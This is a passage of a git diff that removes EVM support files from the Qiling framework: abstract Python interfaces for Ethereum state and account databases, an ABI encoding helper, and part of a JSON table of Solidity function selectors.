Address, topics: Tuple[int, ...], data: bytes) -> None: - """ - Add a log entry. - """ - ... - - @abstractmethod - def get_raw_log_entries(self) -> Tuple[Tuple[int, bytes, Tuple[int, ...], bytes], ...]: - """ - Return a tuple of raw log entries. - """ - ... - - @abstractmethod - def get_log_entries(self) -> Tuple[Tuple[bytes, Tuple[int, ...], bytes], ...]: - """ - Return the log entries for this computation and its children. - - They are sorted in the same order they were emitted during the transaction processing, and - include the sequential counter as the first element of the tuple representing every entry. - """ - ... - - # - # State Transition - # - @classmethod - @abstractmethod - def apply_message( - cls, - state: 'StateAPI', - message: MessageAPI, - transaction_context: TransactionContextAPI) -> 'ComputationAPI': - """ - Execute a VM message. This is where the VM-specific call logic exists. - """ - ... - - @classmethod - @abstractmethod - def apply_create_message( - cls, - state: 'StateAPI', - message: MessageAPI, - transaction_context: TransactionContextAPI) -> 'ComputationAPI': - """ - Execute a VM message to create a new contract. This is where the VM-specific - create logic exists. - """ - ... - - # @classmethod - # @abstractmethod - # def apply_computation(cls, - # state: 'StateAPI', - # message: MessageAPI, - # transaction_context: TransactionContextAPI) -> 'ComputationAPI': - # """ - # Execute the logic within the message: Either run the precompile, or - # step through each opcode. Generally, the only VM-specific logic is for - # each opcode as it executes. - - # This should rarely be called directly, because it will skip over other important - # VM-specific logic that happens before or after the execution. - - # Instead, prefer :meth:`~apply_message` or :meth:`~apply_create_message`. - # """ - # ... - - # - # Opcode API - # - @property - @abstractmethod - def precompiles(self) -> Dict[Address, Callable[['ComputationAPI'], None]]: - """ - Return a dictionary where the keys are the addresses of precompiles and the values are - the precompile functions. - """ - ... - - @abstractmethod - def get_opcode_fn(self, opcode: int) -> OpcodeAPI: - """ - Return the function for the given ``opcode``. - """ - ... - - -class AccountStorageDatabaseAPI(ABC): - """ - Storage cache and write batch for a single account. Changes are not - merklized until :meth:`make_storage_root` is called. - """ - @abstractmethod - def get(self, slot: int, from_journal: bool = True) -> int: - """ - Return the value at ``slot``. Lookups take the journal into consideration unless - ``from_journal`` is explicitly set to ``False``. - """ - ... - - @abstractmethod - def set(self, slot: int, value: int) -> None: - """ - Write ``value`` into ``slot``. - """ - ... - - @abstractmethod - def delete(self) -> None: - """ - Delete the entire storage at the account. - """ - ... - - @abstractmethod - def record(self, checkpoint: JournalDBCheckpoint) -> None: - """ - Record changes into the given ``checkpoint``. - """ - ... - - @abstractmethod - def discard(self, checkpoint: JournalDBCheckpoint) -> None: - """ - Discard the given ``checkpoint``. - """ - ... - - @abstractmethod - def commit(self, checkpoint: JournalDBCheckpoint) -> None: - """ - Collapse changes into the given ``checkpoint``. - """ - ... - - @abstractmethod - def lock_changes(self) -> None: - """ - Locks in changes to storage, typically just as a transaction starts. - - This is used, for example, to look up the storage value from the start - of the transaction, when calculating gas costs in EIP-2200: net gas metering. - """ - ... - - @abstractmethod - def make_storage_root(self) -> None: - """ - Force calculation of the storage root for this account - """ - ... - - @property - @abstractmethod - def has_changed_root(self) -> bool: - """ - Return ``True`` if the storage root has changed. - """ - ... - - @abstractmethod - def get_changed_root(self) -> Hash32: - """ - Return the changed root hash. - Raise ``ValidationError`` if the root has not changed. - """ - ... - - @abstractmethod - def persist(self, db: DatabaseAPI) -> None: - """ - Persist all changes to the database. - """ - ... - - @abstractmethod - def get_accessed_slots(self) -> FrozenSet[int]: - """ - List all the slots that had been accessed since object creation. - """ - ... - - -class AccountAPI(ABC): - """ - A class representing an Ethereum account. - """ - nonce: int - balance: int - storage_root: Hash32 - code_hash: Hash32 - - -class AccountDatabaseAPI(ABC): - """ - A class representing a database for accounts. - """ - @abstractmethod - def __init__(self, db: AtomicDatabaseAPI, state_root: Hash32 = BLANK_ROOT_HASH) -> None: - """ - Initialize the account database. - """ - ... - - @property - @abstractmethod - def state_root(self) -> Hash32: - """ - Return the state root hash. - """ - ... - - @state_root.setter - def state_root(self, value: Hash32) -> None: - """ - Force-set the state root hash. - """ - # See: https://github.com/python/mypy/issues/4165 - # Since we can't also decorate this with abstract method we want to be - # sure that the setter doesn't actually get used as a noop. - raise NotImplementedError - - @abstractmethod - def has_root(self, state_root: bytes) -> bool: - """ - Return ``True`` if the `state_root` exists, otherwise ``False``. - """ - ... - - # - # Storage - # - @abstractmethod - def get_storage(self, address: Address, slot: int, from_journal: bool = True) -> int: - """ - Return the value stored at ``slot`` for the given ``address``. Take the journal - into consideration unless ``from_journal`` is set to ``False``. - """ - ... - - @abstractmethod - def set_storage(self, address: Address, slot: int, value: int) -> None: - """ - Write ``value`` into ``slot`` for the given ``address``. - """ - ... - - @abstractmethod - def delete_storage(self, address: Address) -> None: - """ - Delete the storage at ``address``. - """ - ... - - # - # Balance - # - @abstractmethod - def get_balance(self, address: Address) -> int: - """ - Return the balance at ``address``. - """ - ... - - @abstractmethod - def set_balance(self, address: Address, balance: int) -> None: - """ - Set ``balance`` as the new balance for ``address``. - """ - ... - - # - # Nonce - # - @abstractmethod - def get_nonce(self, address: Address) -> int: - """ - Return the nonce for ``address``. - """ - ... - - @abstractmethod - def set_nonce(self, address: Address, nonce: int) -> None: - """ - Set ``nonce`` as the new nonce for ``address``. - """ - ... - - @abstractmethod - def increment_nonce(self, address: Address) -> None: - """ - Increment the nonce for ``address``. - """ - ... - - # - # Code - # - @abstractmethod - def set_code(self, address: Address, code: bytes) -> None: - """ - Set ``code`` as the new code at ``address``. - """ - ... - - @abstractmethod - def get_code(self, address: Address) -> bytes: - """ - Return the code at the given ``address``. - """ - ... - - @abstractmethod - def get_code_hash(self, address: Address) -> Hash32: - """ - Return the hash of the code at ``address``. - """ - ... - - @abstractmethod - def delete_code(self, address: Address) -> None: - """ - Delete the code at ``address``. - """ - ... - - # - # Account Methods - # - @abstractmethod - def account_has_code_or_nonce(self, address: Address) -> bool: - """ - Return ``True`` if either code or a nonce exists at ``address``. - """ - ... - - @abstractmethod - def delete_account(self, address: Address) -> None: - """ - Delete the account at ``address``. - """ - ... - - @abstractmethod - def account_exists(self, address: Address) -> bool: - """ - Return ``True`` if an account exists at ``address``, otherwise ``False``. - """ - ... - - @abstractmethod - def touch_account(self, address: Address) -> None: - """ - Touch the account at ``address``. - """ - ... - - @abstractmethod - def account_is_empty(self, address: Address) -> bool: - """ - Return ``True`` if an account exists at ``address``. - """ - ... - - # - # Record and discard API - # - @abstractmethod - def record(self) -> JournalDBCheckpoint: - """ - Create and return a new checkpoint. - """ - ... - - @abstractmethod - def discard(self, checkpoint: JournalDBCheckpoint) -> None: - """ - Discard the given ``checkpoint``. - """ - ... - - @abstractmethod - def commit(self, checkpoint: JournalDBCheckpoint) -> None: - """ - Collapse changes into ``checkpoint``. - """ - ... - - @abstractmethod - def lock_changes(self) -> None: - """ - Locks in changes across all accounts' storage databases. - - This is typically used at the end of a transaction, to make sure that - a revert doesn't roll back through the previous transaction, and to - be able to look up the "original" value of any account storage, where - "original" is the beginning of a transaction (instead of the beginning - of a block). - - See :meth:`eth.abc.AccountStorageDatabaseAPI.lock_changes` for - what is called on each account's storage database. - """ - ... - - @abstractmethod - def make_state_root(self) -> Hash32: - """ - Generate the state root with all the current changes in AccountDB - - Current changes include every pending change to storage, as well as all account changes. - After generating all the required tries, the final account state root is returned. - - This is an expensive operation, so should be called as little as possible. For example, - pre-Byzantium, this is called after every transaction, because we need the state root - in each receipt. Byzantium+, we only need state roots at the end of the block, - so we *only* call it right before persistance. - - :return: the new state root - """ - ... - - @abstractmethod - def persist(self) -> MetaWitnessAPI: - """ - Send changes to underlying database, including the trie state - so that it will forever be possible to read the trie from this checkpoint. - - :meth:`make_state_root` must be explicitly called before this method. - Otherwise persist will raise a ValidationError. - """ - ... - - -class TransactionExecutorAPI(ABC): - """ - A class providing APIs to execute transactions on VM state. - """ - @abstractmethod - def __init__(self, vm_state: 'StateAPI') -> None: - """ - Initialize the executor from the given ``vm_state``. - """ - ... - - @abstractmethod - def __call__(self, message: MessageAPI) -> 'ComputationAPI': - """ - Execute the ``transaction`` and return a :class:`eth.abc.ComputationAPI`. - """ - ... - - # @abstractmethod - # def validate_transaction(self, transaction: SignedTransactionAPI) -> None: - # """ - # Validate the given ``transaction``. - # Raise a ``ValidationError`` if the transaction is invalid. - # """ - # ... - - @abstractmethod - def build_evm_message(self, - origin: Address, - gas_price: int, - gas: int, - to: Address, - sender: Address, - value: int, - data: bytes, - code: bytes, - code_address: Address = None, - contract_address: Address = None) -> MessageAPI: - """ - Build and return a :class:`~eth.abc.MessageAPI` from the given ``transaction``. - """ - ... - - @abstractmethod - def build_computation(self, - message: MessageAPI) -> 'ComputationAPI': - """ - Apply the ``message`` to the VM and use the given ``transaction`` to - retrieve the context from. - """ - - ... - - @abstractmethod - def finalize_computation(self, - message: MessageAPI, - computation: 'ComputationAPI') -> 'ComputationAPI': - """ - Finalize the ``transaction``. - """ - ... - - -class ConfigurableAPI(ABC): - """ - A class providing inline subclassing. - """ - @classmethod - @abstractmethod - def configure(cls: Type[T], - __name__: str = None, - **overrides: Any) -> Type[T]: - ... - - -class StateAPI(ConfigurableAPI): - """ - The base class that encapsulates all of the various moving parts related to - the state of the VM during execution. - Each :class:`~eth.abc.VirtualMachineAPI` must be configured with a subclass of the - :class:`~eth.abc.StateAPI`. - - .. note:: - - Each :class:`~eth.abc.StateAPI` class must be configured with: - - - ``computation_class``: The :class:`~eth.abc.ComputationAPI` class for - vm execution. - - ``transaction_context_class``: The :class:`~eth.abc.TransactionContextAPI` - class for vm execution. - """ - # - # Set from __init__ - # - execution_context: ExecutionContextAPI - - computation_class: Type[ComputationAPI] - transaction_context_class: Type[TransactionContextAPI] - account_db_class: Type[AccountDatabaseAPI] - transaction_executor_class: Type[TransactionExecutorAPI] = None - - @abstractmethod - def __init__( - self, - db: AtomicDatabaseAPI, - execution_context: ExecutionContextAPI, - state_root: bytes) -> None: - """ - Initialize the state. - """ - ... - - @property - @abstractmethod - def logger(self) -> ExtendedDebugLogger: - """ - Return the logger. - """ - ... - - # - # Block Object Properties (in opcodes) - # - @property - @abstractmethod - def coinbase(self) -> Address: - """ - Return the current ``coinbase`` from the current :attr:`~execution_context` - """ - ... - - @property - @abstractmethod - def timestamp(self) -> int: - """ - Return the current ``timestamp`` from the current :attr:`~execution_context` - """ - ... - - @property - @abstractmethod - def block_number(self) -> BlockNumber: - """ - Return the current ``block_number`` from the current :attr:`~execution_context` - """ - ... - - @property - @abstractmethod - def difficulty(self) -> int: - """ - Return the current ``difficulty`` from the current :attr:`~execution_context` - """ - ... - - @property - @abstractmethod - def gas_limit(self) -> int: - """ - Return the current ``gas_limit`` from the current :attr:`~transaction_context` - """ - ... - - # - # Access to account db - # - @classmethod - @abstractmethod - def get_account_db_class(cls) -> Type[AccountDatabaseAPI]: - """ - Return the :class:`~eth.abc.AccountDatabaseAPI` class that the - state class uses. - """ - ... - - @property - @abstractmethod - def state_root(self) -> Hash32: - """ - Return the current ``state_root`` from the underlying database - """ - ... - - @abstractmethod - def make_state_root(self) -> Hash32: - """ - Create and return the state root. - """ - ... - - @abstractmethod - def get_storage(self, address: Address, slot: int, from_journal: bool = True) -> int: - """ - Return the storage at ``slot`` for ``address``. - """ - ... - - @abstractmethod - def set_storage(self, address: Address, slot: int, value: int) -> None: - """ - Write ``value`` to the given ``slot`` at ``address``. - """ - ... - - @abstractmethod - def delete_storage(self, address: Address) -> None: - """ - Delete the storage at ``address`` - """ - ... - - @abstractmethod - def delete_account(self, address: Address) -> None: - """ - Delete the account at the given ``address``. - """ - ... - - @abstractmethod - def get_balance(self, address: Address) -> int: - """ - Return the balance for the account at ``address``. - """ - ... - - @abstractmethod - def set_balance(self, address: Address, balance: int) -> None: - """ - Set ``balance`` to the balance at ``address``. - """ - ... - - @abstractmethod - def delta_balance(self, address: Address, delta: int) -> None: - """ - Apply ``delta`` to the balance at ``address``. - """ - ... - - @abstractmethod - def get_nonce(self, address: Address) -> int: - """ - Return the nonce at ``address``. - """ - ... - - @abstractmethod - def set_nonce(self, address: Address, nonce: int) -> None: - """ - Set ``nonce`` as the new nonce at ``address``. - """ - ... - - @abstractmethod - def increment_nonce(self, address: Address) -> None: - """ - Increment the nonce at ``address``. - """ - ... - - @abstractmethod - def get_code(self, address: Address) -> bytes: - """ - Return the code at ``address``. - """ - ... - - @abstractmethod - def set_code(self, address: Address, code: bytes) -> None: - """ - Set ``code`` as the new code at ``address``. - """ - ... - - @abstractmethod - def get_code_hash(self, address: Address) -> Hash32: - """ - Return the hash of the code at ``address``. - """ - ... - - @abstractmethod - def delete_code(self, address: Address) -> None: - """ - Delete the code at ``address``. - """ - ... - - @abstractmethod - def has_code_or_nonce(self, address: Address) -> bool: - """ - Return ``True`` if either a nonce or code exists at the given ``address``. - """ - ... - - @abstractmethod - def account_exists(self, address: Address) -> bool: - """ - Return ``True`` if an account exists at ``address``. - """ - ... - - @abstractmethod - def touch_account(self, address: Address) -> None: - """ - Touch the account at the given ``address``. - """ - ... - - @abstractmethod - def account_is_empty(self, address: Address) -> bool: - """ - Return ``True`` if the account at ``address`` is empty, otherwise ``False``. - """ - ... - - # - # Access self._chaindb - # - @abstractmethod - def snapshot(self) -> Tuple[Hash32, JournalDBCheckpoint]: - """ - Perform a full snapshot of the current state. - - Snapshots are a combination of the :attr:`~state_root` at the time of the - snapshot and the checkpoint from the journaled DB. - """ - ... - - @abstractmethod - def revert(self, snapshot: Tuple[Hash32, JournalDBCheckpoint]) -> None: - """ - Revert the VM to the state at the snapshot - """ - ... - - @abstractmethod - def commit(self, snapshot: Tuple[Hash32, JournalDBCheckpoint]) -> None: - """ - Commit the journal to the point where the snapshot was taken. This - merges in any changes that were recorded since the snapshot. - """ - ... - - @abstractmethod - def lock_changes(self) -> None: - """ - Locks in all changes to state, typically just as a transaction starts. - - This is used, for example, to look up the storage value from the start - of the transaction, when calculating gas costs in EIP-2200: net gas metering. - """ - ... - - @abstractmethod - def persist(self) -> MetaWitnessAPI: - """ - Persist the current state to the database. - """ - ... - - # - # Access self.prev_hashes (Read-only) - # - @abstractmethod - def get_ancestor_hash(self, block_number: BlockNumber) -> Hash32: - """ - Return the hash for the ancestor block with number ``block_number``. - Return the empty bytestring ``b''`` if the block number is outside of the - range of available block numbers (typically the last 255 blocks). - """ - ... - - # - # Computation - # - @abstractmethod - def get_computation(self, - message: MessageAPI, - transaction_context: TransactionContextAPI) -> ComputationAPI: - """ - Return a computation instance for the given `message` and `transaction_context` - """ - ... - - # - # Transaction context - # - @classmethod - @abstractmethod - def get_transaction_context_class(cls) -> Type[TransactionContextAPI]: - """ - Return the :class:`~eth.vm.transaction_context.BaseTransactionContext` class that the - state class uses. - """ - ... - - # - # Execution - # - @abstractmethod - def get_transaction_executor(self) -> TransactionExecutorAPI: - """ - Return the transaction executor. - """ - ... - - @classmethod - @abstractmethod - def get_transaction_context(cls, - message: MessageAPI) -> TransactionContextAPI: - """ - Return the :class:`~eth.abc.TransactionContextAPI` for the given ``transaction`` - """ - ... diff --git a/qiling/arch/evm/abi.py b/qiling/arch/evm/abi.py deleted file mode 100644 index 33620217e..000000000 --- a/qiling/arch/evm/abi.py +++ /dev/null @@ -1,46 +0,0 @@ -#!/usr/bin/env python3 - -from eth_abi import encode_abi, decode_abi, encode_single, decode_single -from eth_utils.abi import collapse_if_tuple -from eth_utils import function_signature_to_4byte_selector, function_abi_to_4byte_selector, decode_hex, encode_hex -from .vm.utils import bytecode_to_bytes - - -class QlArchEVMABI: - @staticmethod - def convert(datatypes:list, values:list) -> str: - return QlArchEVMABI.encode_params(datatypes, values) - - @staticmethod - def encode_params(datatypes:list, values:list) -> str: - for idx, item in enumerate(datatypes): - if item == 'address': - if isinstance(values[idx], int): - values[idx] = bytecode_to_bytes(hex(values[idx])) - elif isinstance(values[idx], str): - values[idx] = bytecode_to_bytes(values[idx]) - - return encode_abi(datatypes, values).hex() - - @staticmethod - def decode_params(datatypes:list, value:str) -> list: - return decode_abi(datatypes, value) - - @staticmethod - def encode_function_call(abi:str, params:list) -> str: - abi = abi.replace(' ', '') - if '(' not in abi or ')' not in abi: - raise ValueError(f'Function signature must contain "(" and ")": {abi}') - signature = function_signature_to_4byte_selector(abi) - inputs = abi[abi.index('('):] - params = encode_single(inputs, params) - return encode_hex(signature + params) - - @staticmethod - def encode_function_call_abi(abi:dict, params:list) -> str: - signature = function_abi_to_4byte_selector(abi) - inputs = ",".join( - [collapse_if_tuple(abi_input) for abi_input in abi.get("inputs", [])] - ) - params = encode_single(f"({inputs})", params) - return encode_hex(signature + params) \ No newline at end of file diff --git a/qiling/arch/evm/analysis/__init__.py b/qiling/arch/evm/analysis/__init__.py deleted file mode 100644 index e69de29bb..000000000 diff --git a/qiling/arch/evm/analysis/signatures.json b/qiling/arch/evm/analysis/signatures.json deleted file mode 100644 index 9bcf8367a..000000000 --- a/qiling/arch/evm/analysis/signatures.json +++ /dev/null @@ -1 +0,0 @@ -{"performReentrancyAttack()": "0x4a4a2a97", "failedKycCount()": "0x3b040fb8", "directPaymentThreshold()": "0x90b17f99", "beneficial()": "0x11ccf822", "erc20token()": "0x1dcea427", "softCap()": "0x906a26e0", "PreSaleStart()": "0x694244f8", "heapSort(uint128[])": "0x0d298318", "sponsoredJackpotToken()": "0x4af69189", "MAXPERWEI()": "0xf2cf687a", "REGULAR_TYPE3()": "0x20b748f4", "totalClaimed()": "0xd54ad2a1", "preIcoEndBlock()": "0x085ca4e3", "remainingInvestment()": "0xaf5cfae8", "getBases()": "0xfbacc43f", "discountedPrice()": "0xc8788134", "pricePreSale()": "0x0fae42cd", "shortLock()": "0x43846fc8", "tokenAllocToTeam()": "0xa4c756c7", "capPerAddress()": "0xa01701dc", "time2()": "0xd6f8ecae", "bonusEnd20()": "0x94c70cb1", "unstop()": "0xf8bd71c7", "endRefundableTime()": "0x8d949635", "auditorAddress()": "0x8f654175", "expirationInSeconds()": "0x3c28b9c0", "townsSold()": "0xac985f0a", "BTC_SUISSE_TIER_3()": "0xf993d955", "buy_spice_melange()": "0xe59af25b", "SetupAccounts()": "0xf110bbdf", "COINS_TO_HATCH_1STRIPPERS()": "0x6e33bc13", "gID_()": "0xb9eca0c8", "currentBeneficiaryCap()": "0x23a6b8ca", "icoTokensSold()": "0xaab725b3", "poolFeeRate()": "0x22b954f8", "weiPerSgd()": "0xbdd5f8da", "expiry_date()": "0x03a0d68f", "Long()": "0x09b0245f", "share3()": "0x0b073865", "spawningManager()": "0x98f5ee5d", "tgeStarted()": "0xde622de4", "BONUS_ICO_ROUND3()": "0x5c72de09", "_mentors()": "0x4a2fb1e4", "numPurse()": "0x0c7516fd", "lastDepositIndex()": "0xa1b8c40f", "TOKEN_SALE1_PRE()": "0x0224dc18", "optionPoolLockTotal()": "0x2a9278c5", "candyCap()": "0xc9818728", "newPrice()": "0x51df9db9", "TOKENS_SALE()": "0x3280922b", "durationPhaseIndex()": "0x8827a985", "minimumFeePlusDividendsPercentage()": "0x572b7a03", "AUTH_CHANGEOWNEDOWNER()": "0x617914be", "SAGA()": "0x5e58331c", "sane()": "0xb4e51b7b", "winPool()": "0x7fe23f62", "stage1Sale()": "0x311bcda6", "m_deployer()": "0x85d80458", "finishedRaceCount()": "0x0b654e7d", "breakLink()": "0xe83447d0", "endSecondWeekICO()": "0x1eb4dac6", "minGasPriceForDrawing()": "0x050394ec", "isMonsterAuction()": "0xbfab4f8b", "WithdrawTithes()": "0x3cf3a338", "kMaxStake()": "0xc973851d", "airdropCount()": "0xe952f74f", "FUNDING_PRESALE_MAX()": "0x9f509ab1", "drawSecondaryWinners()": "0xfa78b172", "itoEndTime()": "0x685ae2a9", "lockGate()": "0x21b6ac62", "FEATURE_TRANSFERS_ON_BEHALF()": "0x8f6fba8c", "tokenPerUsdDenominator()": "0xe35e6078", "ownerMintRate()": "0xa0d8b4e9", "pre_mined_supply()": "0x437c9162", "tokenCost()": "0x912221d5", "DATE_31_DEC_2018()": "0x32f7470b", "verifiedWinnersCount()": "0xa8b322b6", "Sold_Token()": "0xb3fcb85b", "retainedEarning()": "0x752329ec", "allOfferingPercentage()": "0x28852b61", "createTokenToOperation()": "0xa878ad27", "tokensIssuedTotal()": "0x84ef0778", "teamTokenSupply()": "0xfd17f289", "AUCTION_TOKENS()": "0x03395ba5", "repoBase()": "0xcaf1bb7c", "currentProposal()": "0x2b49d425", "supplyMultiplier()": "0x73f64212", "investor_bonus()": "0xc88c5101", "getDepositor()": "0xe1b7535f", "SHA256()": "0xdcfe64e9", "cycleLength()": "0xeac471a0", "lastPurchaseTimestamp()": "0xbf1d4c66", "seedContract()": "0x63534dd8", "allowOwner()": "0x4016e969", "donationReceiver()": "0x213ea6bb", "NUM_POTATOES()": "0x24444749", "RecordNum()": "0x4a1a650d", "PARTNERS_WALLET()": "0xdd1aa549", "genPot_()": "0x9b1d834c", "maxTxGasPrice()": "0x42b5a2a9", "mainSaleExchangeRate()": "0xcd154c59", "yesVoteSum()": "0xf400d37b", "weiPerFee()": "0xebdb730d", "SMILO_SALES_AMOUNT()": "0x5f8cf6c4", "preIcoMax()": "0x4811af4a", "trivialThreshold()": "0x04c8384d", "currentDividendPeriodNo()": "0x1123adb1", "minVotedTokensPerc()": "0x84219204", "startAtBlockNumber()": "0x56eeb3b0", "presaleBonusTier4()": "0xef006b65", "nextPaymentTime()": "0x738a2cf8", "maxBatchAssignment()": "0xae5a4a7f", "ILLIQUID_TOKENS()": "0x8f67f9d7", "TicketsSoldForThisGame()": "0x0aed9c45", "buyItem2()": "0x21a5c1c3", "c4c()": "0x41445fd2", "firstFreeAddressIndex()": "0xc7daae0a", "maxSaleBalance()": "0x47e87fcd", "limitAmount()": "0x78abafaf", "maximumTokens()": "0xc3a9bd8b", "totalRemainInInventory()": "0xb76dfb28", "roundFactory()": "0x5485868a", "getContractOrigin()": "0xfd5d3e01", "presaleAmount()": "0xb138d500", "_crowdsalePaused()": "0x53d7edbc", "syncDate()": "0x03e2b9f5", "LOOMIA_LOOMIA_REMAINDER_ADDR()": "0xaf3a4feb", "pricegreengrey()": "0xb05609ce", "EGGS_TO_HATCH_1PACIFIST()": "0x3fdddf01", "walletWebydo()": "0xf27b8084", "DayInSecs()": "0x485d5dd2", "delegation()": "0xdf5cf723", "desiredOutcome()": "0xe7255ef9", "bonusEnds3()": "0x05e633e2", "corruptElite()": "0x3beea695", "teamAddressFreezeTime()": "0x6e88865a", "csale()": "0x2c3d3453", "Sleep()": "0x624ecda9", "Token_AllowTransfer()": "0x5f856dbf", "kingGladiator()": "0x3aaec03d", "timeTier1()": "0x908da4e8", "AUTH_FREEZEACCOUNT()": "0x6bea989d", "abcToken()": "0xe7574128", "initialARXSupplyInWei()": "0xdf42dfa9", "preBountyAdded()": "0x3e81ba66", "payoutPool()": "0x6273106a", "beerAndHookersCap()": "0xe7b6ff08", "LIMIT_STAR4()": "0x6bbae823", "LEGAL()": "0xd110f0e6", "daoAddress()": "0x2131c68c", "bounty0xToken()": "0x52e32a55", "defaultLimits()": "0x7f5e495d", "GAS_LIMIT_IN_WEI()": "0x995ab62e", "investorsAllocation()": "0x3e4b2570", "stageThreeEnd()": "0x3fd3a371", "maxTokenPurchase()": "0x09aa3dcf", "CELL_ADD_SPACE()": "0x0e940fd8", "token_was_created()": "0xb5d7eca5", "alive()": "0x753899e9", "getDSTName()": "0x1b1ccc47", "timeIncrease()": "0xd94d0316", "ReserveAccount()": "0x58f11566", "SummRew()": "0x72c4639e", "icoSaleDeposit()": "0xb44f8cda", "icoTotalBalance()": "0x3b893c2d", "withdraw_if_failed()": "0x97ab5baa", "returnUnsoldSafeLarge()": "0xd34b1aef", "maxLimit()": "0x1a861d26", "prizeEth()": "0x0ec0692a", "roundTime()": "0xee5f8c8f", "EURWEI()": "0x6ec05f13", "bountyToken()": "0x2d4147e3", "etherRatio()": "0x8d7117d4", "preIcoEnds()": "0xef35d902", "weiPresaleMax()": "0x917569a8", "getCurrentInfo()": "0xb93ab165", "MaxICOSellSupply()": "0x474e9e74", "bbPublicSaleWallet()": "0x2352551f", "createdAt()": "0xcf09e0d0", "teamTokenWallet()": "0xbabbb78d", "priceOfEthOnUSD()": "0xa9d0b164", "birthBlockThreshold()": "0x89c73565", "eventVenue()": "0xe22bda35", "firstDay()": "0xcf1405fe", "sentTokensToBountyOwner()": "0x5b1a77fe", "seedSaleFinished()": "0x7c051d47", "maxICOFirstSupply()": "0xa99e0a81", "dividendRate()": "0xd6a3f374", "countTotalInvestors()": "0x474cdca2", "wc()": "0xd3ecb95f", "STARTING_Dragon()": "0x6d19ce04", "releasedCount()": "0x4b1d00ee", "bonusMintingAgent()": "0xcda35494", "withdrawDeveloperCut()": "0x13a7070f", "readSellTokenAmount()": "0x8c04b985", "totalRewards()": "0x0e15561a", "initialTokenPrice()": "0x2ca0228a", "mintedGBT()": "0x5bbfd0d7", "noncex()": "0xb3f5ab78", "getUriSetCount()": "0xb086d5aa", "WMToken(address,uint256)": "0xc8894a0c", "Duarte()": "0x8b4b891b", "addSmallInvestor(address,uint256,uint256)": "0xec9edfc2", "CONEGTY()": "0xd135df42", "MetisCoin()": "0xd6236ad0", "RadarSpeedChain()": "0x0c8b494d", "BteCoinToken()": "0x092dde45", "unholdGold(address,uint256)": "0xd30beffa", "unholdMntp(address,uint256)": "0xf022a867", "EDToken()": "0xf4ae2164", "forwardEherToOwner()": "0x70049c1c", "MODICOIN()": "0xfc006216", "PXMCToken(uint256,string,uint8,string)": "0xce7aa79f", "BAJIDOR(uint256,string,uint8,string)": "0xe554af57", "gift(uint256,address)": "0x83a076be", "purchaseParrot(uint256)": "0x770c59b8", "setPrice(uint8,uint128)": "0xc7a4af15", "setParentAddress(address,address)": "0xf81d0292", "recommendedPrice(uint16)": "0x2d6c25fa", "finishRetrieving()": "0x0240ab3f", "retrieve(address,uint256)": "0xc3a2a665", "getCurrentTokenPriceICO(uint256)": "0x3ab55c44", "getCurrentTokenPricepreICO(uint256)": "0x4a7d8bcc", "getToken(address,uint256)": "0x43d7cce6", "doit(address)": "0x1e01a0e6", "TokenNedCoin(uint256,string,uint8,string)": "0x0431dd86", "LLV_v31_5()": "0x3dfa1c46", "getPower(uint256)": "0x017fe809", "getItemKindCount()": "0xd9c850f4", "getItemCount(uint256)": "0xbdc441b2", "getItemCounts()": "0xa815a85d", "setItemAvailable(uint256,bool)": "0xfc2c1ddb", "addItem(bytes16,uint16,uint16,bool)": "0xd4ad678e", "useItem(address,uint256,uint256)": "0x345cad7e", "BMT(uint256,string,uint8,uint256,string)": "0x714c5d9d", "LecBatchTransfer()": "0x71f098c8", "CETH()": "0x61096820", "revokeVested()": "0x3a4a921e", "releaseVested()": "0x1f800e8e", "setSmallInvestor(address,uint256,uint256)": "0x498a37f0", "getDepositedOf(address)": "0xe8bba4f6", "_setBonusRate(uint256)": "0x42469e97", "change_owned(address)": "0x8821bb43", "ManUnitedSC()": "0xe868cd17", "saleOpen()": "0x99288dbb", "getRaisedForCurrentStage()": "0xc11efcdc", "getCurrentCap()": "0xd8c30700", "setupSale(uint256,address)": "0xbd3e7401", "setFOUNDERS_POOL_ADDR(address)": "0x930429ea", "setCOMMUNITY_POOL_ADDR(address)": "0x40307cdd", "setFOUNDATION_POOL_ADDR(address)": "0xdf1d4559", "getWithdrawableAmountFIIT(address)": "0x40c05401", "getWithdrawableAmountANPES(address)": "0xd5320300", "setITTMultiSig(address)": "0x958a3698", "ITToken()": "0x43b7d9c8", "TokenMintGeneral()": "0x2cd64f65", "Moneyplant()": "0x0ec8e2b4", "transferKing(address)": "0x06d8619b", "isICAP(address,address)": "0x0b85877f", "_generic(bytes,uint256,address)": "0x70775a59", "BitEyeEx(address)": "0xefce1d66", "Archetypal()": "0x6b038742", "BitDex(address,address,address,uint256,uint256,uint256)": "0x073455f1", "YZChain(uint256,string,uint8,string)": "0x8fd0290f", "getUserInfoById(uint256)": "0x31f01140", "getUserInfo()": "0x5d8d1585", "getUserid(address)": "0x5ad82148", "GotingToken()": "0xb6481a92", "PONO()": "0x6e4f68b5", "get_price()": "0x11f37ceb", "force_stop()": "0x9bb1fd66", "SEO()": "0x70f79b84", "olympus()": "0xf32f6a23", "ZUKToken()": "0x07e7d5b9", "setProofAddr(string)": "0x0ff42eab", "claimWithSignature(bytes)": "0x8ee4fd8a", "checkFind(address,address)": "0x22824bbd", "claimFor(address,address)": "0xb4ba9e11", "XEVENUE()": "0x1ebd8e6d", "WE(uint256,string,uint8,string)": "0x8da2defb", "AllAmericanCoin()": "0xfc8dae84", "BINGToken()": "0xdaf49451", "_getBalance(address)": "0xee21aa64", "issueAndLock(address,uint256)": "0xd186899a", "VaultbankVotingToken()": "0xff470507", "F2D()": "0x8a237f27", "companionsListCount()": "0x9e6fb394", "removeCompanion(address)": "0x4d7bc8c9", "addCompanion(address)": "0xa19beba9", "NOTtoken()": "0x5bb447a8", "HSCToken(uint256,string,string,address)": "0x44c2dd71", "PUNDI()": "0xeb2b6e95", "approveOwnerTransfer(bytes32)": "0x584af2c3", "ownerTransfer(address,address,uint256)": "0xa1291f7f", "flyDrop(address[],uint256[])": "0x54ea1af9", "setBudget(address,address,uint256)": "0x1b9d4c8e", "prepare(uint256,address,address,uint256,bytes)": "0xab519b0c", "KittenCoin()": "0x62c1adb0", "IQIAN(uint256,string,uint8,string)": "0xfe1f06ea", "CLRCoin()": "0xe07a5d29", "investor_clearRefBonus(address)": "0x0d0a6bf2", "investor_addRefBonus(address,uint256)": "0xca4401f1", "investor_insert(address,uint256)": "0xd562de0b", "receiveExternalProfits()": "0xb6055167", "showDividendsAvailable()": "0x9c15b04b", "showLiveDividends()": "0x923211f5", "determinTID(uint256,uint256)": "0xb13770af", "startKilling()": "0x84cfa08c", "createTeam(uint256,uint256)": "0x5b60fa6b", "distribute(uint256,uint256,uint256,uint256)": "0x61465a32", 